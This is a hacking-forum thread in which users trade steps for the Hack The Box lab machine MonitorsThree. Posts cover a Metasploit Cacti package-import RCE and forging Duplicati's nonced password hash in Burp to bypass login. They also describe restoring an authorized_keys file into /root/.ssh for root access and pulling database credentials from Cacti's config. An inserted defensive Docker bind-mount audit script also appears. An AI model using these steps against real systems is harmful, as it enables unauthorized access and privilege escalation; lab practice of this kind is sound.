[HTB] MonitorsThree
by celsius - Saturday August 24, 2024 at 05:26 PM
(Aug 24, 2024, 11:22 PM)noidontwant Wrote:
(Aug 24, 2024, 11:14 PM)osamy7593 Wrote: can't import package in cacti why

multi/http/cacti_package_import_rce

just update to latest metasploit-framework from website
Reply
this nonce shit is so frustrating

Reply
(Aug 25, 2024, 07:58 AM)test888 Wrote:
(Aug 25, 2024, 07:48 AM)jsvensson Wrote: for those who have trouble bypassing duplicati authentication
in burp you do intercept send login do forward copy session_nonce to noncedpwd command - substitute result to password - forward and then disable intercept
for getting shell as root:
generate ssh keys on your box - copy public key to some folder on box as authorized_keys, in duplicati create backup to backup this file and then restore it to /source/root/.ssh/ - now you should be able login with generated key as root

What are your steps to create the backup?

i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
then just do ssh root@ip -i file_with_key

(Aug 25, 2024, 08:31 AM)teky Wrote: this nonce shit is so frustrating

it's rather easy just do it with steps:
1. intercept in burp
2. login with some pass
3. forward login
4. copy session-nonce and decode it from url
5. put it in var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("your_nonce") + saltedpwd)).toString(CryptoJS.enc.Base64);
6. copy noncedpwd to password in intercepted request
7. forward
8. stop intercepting
you should be logged
Reply
ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?
Reply
Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root


(Aug 25, 2024, 08:57 AM)Eggsy Wrote: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?


Missing -i before id_rsa

Reply
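Added example, not part of any post in this thread: a defender-side check for the condition the post above relies on, where the backup tool sees the host's system files under /source and a restore can therefore write to the host's /root/.ssh. It assumes Duplicati runs in a Docker container with the host filesystem bind-mounted at /source (the thread only says the system files are under /source); the `SENSITIVE` list, the function names and the sample `docker inspect` data are constructed for illustration.

```python
import json
from pathlib import PurePosixPath

# Host paths where write access is equivalent to root on the host (assumed list).
SENSITIVE = ["/root/.ssh", "/etc", "/var/spool/cron"]

# Constructed sample shaped like `docker inspect` output; not taken from the box.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/duplicati", "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/source", "RW": True},
        {"Type": "bind", "Source": "/opt/duplicati/config", "Destination": "/config", "RW": True}]},
    {"Name": "/backup-ro", "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/source", "RW": False}]},
    {"Name": "/web", "Mounts": [
        {"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
         "Destination": "/data", "RW": True}]},
])

def covers(host_dir, target):
    """True if host_dir equals target or is one of its parent directories."""
    src, tgt = PurePosixPath(host_dir), PurePosixPath(target)
    return src == tgt or src in tgt.parents

def audit_mounts(inspect_json):
    """List bind mounts that expose a sensitive host path to a container."""
    findings = []
    for container in json.loads(inspect_json):
        for m in container.get("Mounts", []):
            if m.get("Type") != "bind":
                continue  # only bind mounts are checked in this example
            exposed = [p for p in SENSITIVE if covers(m["Source"], p)]
            if exposed:
                findings.append({"container": container["Name"].lstrip("/"),
                                 "host": m["Source"], "inside": m["Destination"],
                                 "exposed": exposed, "writable": bool(m.get("RW"))})
    return findings

def to_host_path(path_in_container, mount):
    """Translate a path seen inside the container to the host path it lands on."""
    try:
        rel = PurePosixPath(path_in_container).relative_to(mount["inside"])
    except ValueError:
        return None  # path is not under this mount
    return str(PurePosixPath(mount["host"]) / rel)

if __name__ == "__main__":
    for f in audit_mounts(SAMPLE_INSPECT):
        level = "HIGH (read-write)" if f["writable"] else "review (read-only)"
        print(f"{level}: {f['container']} maps host {f['host']} at {f['inside']}: {f['exposed']}")
```

A read-write finding means any restore job in that container can overwrite the listed host paths; narrowing the bind mount to the directories that actually need backing up removes that path.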
chmod 600 id_rsa
Reply
(Aug 25, 2024, 08:58 AM)aasdawejkasjdkasd Wrote: Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root


(Aug 25, 2024, 08:57 AM)Eggsy Wrote: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?


Missing -i before id_rsa

to get marcus just need to read i think path is /var/www/html/cacti/include/config.php with cacti db creds and then use mysql to get hash for marcus password, crack it then in shell su marcus (ssh is only available with key) - from it you could copy his id_rsa
Reply
(Aug 25, 2024, 08:58 AM)aasdawejkasjdkasd Wrote: Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root


(Aug 25, 2024, 08:57 AM)Eggsy Wrote: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?


Missing -i before id_rsa
oh! Thank you it works now. I might need a sleep xd
Reply
(Aug 25, 2024, 06:09 AM)humanai Wrote:
(Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote:
(Aug 25, 2024, 04:34 AM)0x404 Wrote:
(Aug 25, 2024, 04:32 AM)f4k3h4ck3r Wrote:
(Aug 25, 2024, 03:59 AM)rootme1122 Wrote: var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not work

This looks correct, make sure you use the correct nonce for your session

Everything was correct but still did not work for me
Reply
(Aug 25, 2024, 09:34 AM)f4k3h4ck3r Wrote:
(Aug 25, 2024, 06:09 AM)humanai Wrote:
(Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote:
(Aug 25, 2024, 04:34 AM)0x404 Wrote:
(Aug 25, 2024, 04:32 AM)f4k3h4ck3r Wrote: I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not work

This looks correct, make sure you use the correct nonce for your session

Everything was correct but still did not work for me

same here Login failed: Unauthorized
Reply

